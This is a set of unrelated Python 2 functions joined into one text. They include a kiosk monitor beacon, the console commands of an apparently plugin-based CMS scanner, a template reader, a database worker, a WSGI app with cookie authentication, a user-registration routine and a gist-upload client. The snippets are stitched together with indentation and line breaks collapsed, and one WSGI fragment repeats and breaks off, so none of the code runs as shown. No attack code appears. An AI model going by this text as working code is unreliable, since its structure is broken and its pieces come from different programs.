def run(self): print '[Monitor]sending beacon request', time.ctime() try: """模拟向服务器的beacon请求""" data = self.get_attrs() post_param = { "data": json.dumps(data) } req_url = self.conf['server'] + '/api/beacon?kioskId=' + data['kiosk_id'] logger.info('[Monitor]req url: ' + req_url) server=self.conf['server'] resp_body, resp_status = lib.inet.http_post(req_url, server, post_param) if len(resp_body) > 0: resp_body = json.loads(resp_body) print resp_body, resp_status, '\n' except Exception, e: logger.error('[Monitor] '+str(e))
def do_options(self, line): """ 插件设置项 :return: """ if self.current_plugin: rn = self.show_options() if isinstance(rn, str): logger.error(rn) else: print "\n\t%-20s%-40s%-10s%s" % ("Name", "Current Setting", "Required", "Description") print "\t%-20s%-40s%-10s%s" % ("----", "---------------", "--------", "-----------") for option in rn: print "\t%-20s%-40s%-10s%s" % (option["Name"], option["Current Setting"], option["Required"], option["Description"]) print else: logger.error("Select a plugin first.")
def read( path, name, extension = 'html', access = RO_ACCESS ): ''' read() tries to load the selected template and returns its content. ''' fullPath = os.path.join( path, str(name) + ( '' if len( extension ) and extension[0] == '.' else '.' ) + extension ) if os.path.exists( fullPath ): logger.debug( ' loading template file at \'%s\'' % fullPath ) cnt = '' try: fileObject = open( fullPath, 'r' ) cnt = fileObject.read() fileObject.close() if access == RO_ACCESS: cnt = REGEXP.sub( '', cnt ) except IOError: logger.error( ' can\'t access template file: \'%s\'' % fullPath ) return cnt else: logger.error( ' template file doesn\'t exist: \'%s\'' % fullPath ) return ''
def worker(self, sql_list=None, callback=None): rs = False if not sql_list: return rs self.db.autocommit(False) try: for sql in sql_list: self.Q(sql) self.db.commit() # 放个钩子 if callback: callback() rs = True except: error("worker error: ", exc_info=True) self.db.rollback() rs = False finally: self.db.autocommit(True) return rs
def __init__(self): """define data structure to keep monitor data""" self.ds = { 'kiosk_id': '' , 'kiosk_ip': '' , 'mem_used': '' , 'cpu_used': '' , 'disk_free_size': '' , 'udm_rental_started': 0 , 'udm_controller_started': 0 , 'last_sync_time': 0 , 'net_recv_bytes': 0 # 网卡接收流量 , 'net_send_bytes': 0 # 网卡发送流量 , 'last_boot_time': 0 # 上次开机时间 , 'ubx_version': '' # ubx 程序版本号 } conf = self.get_config() if len(conf) == 0: logger.error('invalid monitor config file') sys.exit(-1) self.conf = conf
def do_info(self, plugin): """ 插件信息 :param plugin: string, 插件名称 :return: """ if not plugin: if self.current_plugin: plugin = self.current_plugin else: logger.error("info <plugin>") return if self.info_plugin(plugin): name, author, cms, scope, description, reference = \ self.info_plugin(plugin) print "\n%15s: %s" % ("Name", name) print "%15s: %s" % ("CMS", cms) print "%15s: %s\n" % ("Scope", scope) print "Author:\n\t%s\n" % author print "Description:\n\t%s\n" % description print "Reference:\n\t%s\n" % reference else: logger.error("Invalid plugin: %s" % plugin)
def do_set(self, arg): """ 设置参数 :param arg: string, 以空格分割 option, value :return: """ if self.current_plugin: if len(arg.split()) == 2: option = arg.split()[0] value = arg.split()[1] rn = self.set_option(option, value) if rn.startswith("Invalid option:"): logger.error(rn) else: print rn else: logger.error("set <option> <value>") else: logger.error("Select a plugin first.")
def wsgiblankApplication( environ, startResponse ): '''main function of the wsgiblank''' logger.info( 'running in wsgi mode' ) # reading configuration values try: urlPath = environ['PATH_INFO'].strip('/').split('/') except StandardError: urlPath = [''] try: queryString = urlparse.parse_qs( environ['QUERY_STRING'], keep_blank_values = 1 ) except StandardError: queryString = [] #Serve static for WSGI servers if SERVERISAPACHE is False: if urlPath[0].lower() in STATIC: path = os.path.join(INSTALLPATH, 'static', environ.get('PATH_INFO', '').lstrip('/')) #set path if os.path.exists(path): #it exists? filestat = os.stat(path) #get file stats fileToServe = file(path,'r') #read file mimeType = mimetypes.guess_type( path ) #guess mime-type #set headers if mimeType[0] == None: headers = [( CONTENT_LENGTH, str( filestat.st_size ) )] else: headers = [( CONTENT_TYPE, mimeType[0] ), ( CONTENT_LENGTH, str( filestat.st_size ) )] startResponse('200 OK', headers) #set response return environ['wsgi.file_wrapper'](fileToServe) #return file else: logger.debug('static content not found: %s' % str(path)) return notFound(environ, startResponse) #404 try: requestBodySize = int(environ.get('CONTENT_LENGTH', 0)) except ValueError: requestBodySize = 0 # Saving wsgi.input since it can be read only once wsgiInputStorage = StringIO(environ['wsgi.input'].read(requestBodySize)) environ['wsgi.input'] = wsgiInputStorage try: postData = urlparse.parse_qs( environ['wsgi.input'].read(requestBodySize), True ) except StandardError: postData = [] # seek back to the first byte of wsgiInputStorage wsgiInputStorage.seek(0) environ['wsgi_input'] = wsgiInputStorage cookies = {} if 'HTTP_COOKIE' in environ: for i in environ['HTTP_COOKIE'].split(';'): cookie = i.strip().partition('=') try: cookies[cookie[0]] = cookie[2].strip() except StandardError: pass logger.debug( ' urlPath: %s' % str( urlPath ) ) logger.debug( ' queryString: %s' % str( queryString ) ) try: logger.debug( ' userAgent: %s' % str( environ[ 'HTTP_USER_AGENT' ] if 'HTTP_USER_AGENT' in environ else '' ) ) logger.debug( ' remoteAddr: %s' % str( environ[ 'REMOTE_ADDR' ] if 'REMOTE_ADDR' in environ else '' ) ) except StandardError: pass for i in cookies.keys(): logger.debug( ' cookie: %s = %s' % (i, cookies[i]) ) accessLevel = NO_ACCESS userName = '' # authentication can be disabled for debug reasons via config file enableAuthentication = 1 try: if str( config.get( 'authentication', 'enableAuthentication' ) ).lower() in ['false', '0']: enableAuthentication = 0 accessLevel = int( config.get( 'authentication', 'accessLevel' ) ) userName = str( config.get( 'authentication', 'userName' ) ) except StandardError: pass # checking authentication if enableAuthentication and AUTHCOOKIENAME in cookies: try: [ uName, key ] = cookies[AUTHCOOKIENAME].strip().split(':') accessLevel = auth.querySession( uName, key ) if accessLevel > NO_ACCESS: userName = uName except ValueError: pass logger.debug( ' accessLevel: %d, username: %s' % (accessLevel, userName) ) if urlPath[0].lower() == 'debug' and accessLevel == RW_ACCESS: raise Exception('debug') else: # serve the requested content # decide which module to call moduleFile = '' moduleName = DEFAULT_MODULE if not SERVERISAPACHE: if urlPath[0] != 'wsgiblank' or urlPath == []: urlPath.insert(0, 'wsgiblank') if len(urlPath) == 1: # for evaluating urlPath[0 if SERVERISAPACHE else 1] urlPath.insert(1, '') if urlPath == [] or not urlPath[0 if SERVERISAPACHE else 1].lower() in MODULES: # if the requested module is not available or no module is specified, load the # default one from the config logger.debug( ' module not found, falling back to default module: %s' % DEFAULT_MODULE ) moduleFile = os.path.join( LIBPATH, 'module', MODULES[ DEFAULT_MODULE ][ 'dirname' ], MODULES[ DEFAULT_MODULE ][ 'filename' ] ) else: # loading the selected module moduleName = urlPath[0 if SERVERISAPACHE else 1].lower() logger.debug( ' trying to load module: %s' % moduleName ) if MODULES[moduleName]['enabled'] == 'enabled' and MODULES[moduleName]['access'] <= accessLevel: # load selected module moduleFile = os.path.join( LIBPATH, 'module', MODULES[ moduleName ][ 'dirname' ], MODULES[ moduleName ][ 'filename' ] ) logger.debug( ' determining module file: %s' % moduleFile ) else: # load default module moduleFile = os.path.join( LIBPATH, 'module', MODULES[ DEFAULT_MODULE ][ 'dirname' ], MODULES[ DEFAULT_MODULE ][ 'filename' ] ) logger.debug( ' don\'t load module because status is disabled or level of access is not met (status: %s, access: %d)' % ( MODULES[moduleName]['enabled'], MODULES[moduleName]['access'] ) ) try: # try to load the module lib module = imp.load_source( moduleName, moduleFile ) except IOError as eIO: logger.error( ' unable to load requested module: \'%s\'' % moduleFile ) logger.error( ' got exception: %s' % eIO ) logger.debug( ' module loaded: \'%s\'' % moduleFile ) logger.debug( ' postData: %s' % str( postData ) ) responseHeaders, returnStatus, content = module.content( userName, accessLevel, command = urlPath[1].lower() if len( urlPath ) > 1 else '', queryString = queryString, postData = postData, cookies = cookies, ) startResponse( returnStatus, responseHeaders ) return [ content ]
async def add_user(obj): ''' * `reg_qid` 注册id 即微信/qq/微博的openid或者手机号 * `token` * `reg_source` 注册模式 wx:微信 qq:QQ,wb:新浪微博 mb:手机号 * `invite_uid` 邀请uid * `ip` 注册ip * `os_type` os类型 * `device_id` device_id * `app_version` 注册来自的app版本号 * `channel` 渠道 * `nickname` * `gender` * `figure_url` * `figure_url_other` 其他头像 * `province` * `city` * `country` * `year` 出生年 ''' ret = {'uid': None, 'ticket': None, 'message': '', 'code': 0} if obj['invite_uid']: res = UserLib.check_user_by_uid(obj['invite_uid']) if not res: info('邀请人无效 %s', obj['invite_uid']) obj['invite_uid'] = '0' else: obj['invite_uid'] = '0' res = UserLib.get_info_by_qid(obj['reg_qid'], obj['reg_source']) if res: ret['message'] = '%s已注册,请直接登陆' % UserLib.REG_SOURCE_DESC.get(obj['reg_source'], '') ret['code'] = err_code._ERR_ALREADY_REGISTERED return ret m = tools.mysql_conn() m_score = None r = tools.get_redis() try: salt = UserLib.get_salt() sql = "INSERT INTO o_user_basic(ctime, channel, os_type, app_version, package_name, reg_ip, invite_uid, reg_source, reg_qid, salt, device_id, status) " \ "VALUES(NOW(), %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, 1)" args = (obj['channel'], obj['os_type'], obj['app_version'], obj['package_name'], obj['reg_ip'], obj['invite_uid'], obj['reg_source'], obj['reg_qid'], salt, obj['device_id']) m.TQ(sql, args) uid = m.db.insert_id() assert uid m_score = tools.mysql_conn('d') if obj['reg_source'] == 'mb': # 手机号注册,昵称默认为139*****888这种(隐藏中间5位) obj['nickname'] = '%s*****%s' % (str(obj['reg_qid'])[:3], str(obj['reg_qid'])[-3:]) obj['nickname'] = obj['nickname'].strip() # 有一些用户名前后有空格或空行,处理一下 ticket = await UserLib.get_new_ticket(uid, obj['reg_qid'], salt) sql = "INSERT INTO o_user_extra(uid, reg_source, reg_qid, token, nickname, gender, figure_url, figure_url_other, province, city, country, year) " \ "VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)" args = (uid, obj['reg_source'], obj['reg_qid'], obj['token'], obj['nickname'], obj['gender'], obj['figure_url'], obj['figure_url_other'], obj['province'], obj['city'], obj['country'], obj['year']) m.TQ(sql, args) # info('uid: %s, score_table: %s' % (uid, UserLib._which_score_table(uid))) m_score.TQ("INSERT INTO %s (uid, score) VALUES(%%s, %%s)" % UserLib._which_score_table(uid), (uid, 0)) m.db.commit() m_score.db.commit() UserLib.clear_cache(uid, obj['reg_qid'], obj['reg_source']) except: traceback.print_exc() try: m.db.rollback() except: pass if m_score: try: m_score.db.rollback() except: pass error('数据库错误, 添加新用户时出错', exc_info=True) ret['message'] = '注册失败' ret['code'] = err_code._ERR_REGISTERED_ERROR return ret info('用户注册成功 reg_qid: %s uid: %s ticket: %s', obj['reg_qid'], uid, ticket) ret['uid'] = uid ret['ticket'] = ticket return ret
def push(self): # TODO: Implements push. conf = config.getConfig() res = self._do_auth() if res is not None: if not res: if conf.getboolean('check', True): print 'Token is invalid, please use paste.py gist auth to get a new token.' sys.exit(1) else: del self.req.headers['Authorization'] files = conf.require('files') if files.count(sys.stdin) > 1: raise exception.InvalidValue('stdin was listed more than once!') logger.debug('private: ' + ('yes' if conf.require('private') else 'no')) logger.debug('description: ' + conf.require('description')) logger.debug('files: ' + str(len(files))) post_data = { 'public' : not conf.require('private'), 'description' : conf.require('description'), } file_data = dict() try: for file in files: logger.info('reading file ' + file.name) if file is sys.stdin: print 'Type your content here, end with EOF' print 'Use Ctrl-C to interrupt, if you have mistyped something.' content = file.read() logger.debug('file ' + file.name + ': %d lines, %d bytes' % (content.count('\n'), len(content))) fname = os.path.basename(file.name) now = 2 if fname in file_data: if '.' in fname: name, ext = fname.rsplit('.', 1) else: name, ext = fname, '' while (name + '-' + str(now) + '.' + ext) in file_data: now += 1 fname = (name + '-' + str(now) + '.' + ext) logger.debug('final filename: ' + fname) file_data[fname] = { 'content' : content, } except KeyboardInterrupt: logger.warn('Ctrl-C received, exiting.') sys.exit(1) post_data['files'] = file_data post_str = json.dumps(post_data) post_url = _api_base + '/gists' logger.debug('post url: ' + post_url) try: resp = self.req.post(post_url, data=post_str, headers={ 'Content-Type' : 'application/json', }) except exceptions.RequestException as e: logger.error('Post error: ' + e.message) raise exception.ServerException(e) logger.debug('http ok.') logger.info('server response: %d %s' % (resp.status_code, resp.reason)) if resp.status_code == 201: logger.info('gist created') url = resp.json()[u'html_url'] gistid = url.rsplit('/', 1)[1] print 'HTTP Link: ' + url print 'Paste.py uri: gist://' + gistid else: raise exception.ServerException('Server responsed with unknown status: %d %s ' % (resp.status_code, resp.reason))
WEBSERVERHOST = config.get( 'general', 'WEBSERVERHOST' ) WEBSERVERPORT = config.get( 'general', 'WEBSERVERPORT' ) AUTHCOOKIENAME = config.get( 'authentication', 'COOKIENAME' ) except Exception as e: raise Exception( 'error during processing config file: \'%s\'' % e) sys.path.append( LIBPATH ) import lib.logger as logger import lib.utils as utils import lib.auth as auth from lib.conf import * STATIC = utils.getFolders(os.path.join(INSTALLPATH, 'static')) if STATIC == 0: logger.error( 'Listing static folders failed' ) #All URLs are prefixed with wsgiblank and it's handled differently on Apache and stand-alone wsgi server mode SERVERISAPACHE = True # 404 handler def notFound( environ, startResponse ): '''return 404 if content not found''' startResponse( "404 " + CODE[404], [( CONTENT_TYPE, CONTENT_TXT ), ( CONTENT_LENGTH, str( len( CODE[404] ) ) )] ) return [ CODE[404] ] def wsgiblankApplication( environ, startResponse ): '''main function of the wsgiblank''' logger.info( 'running in wsgi mode' )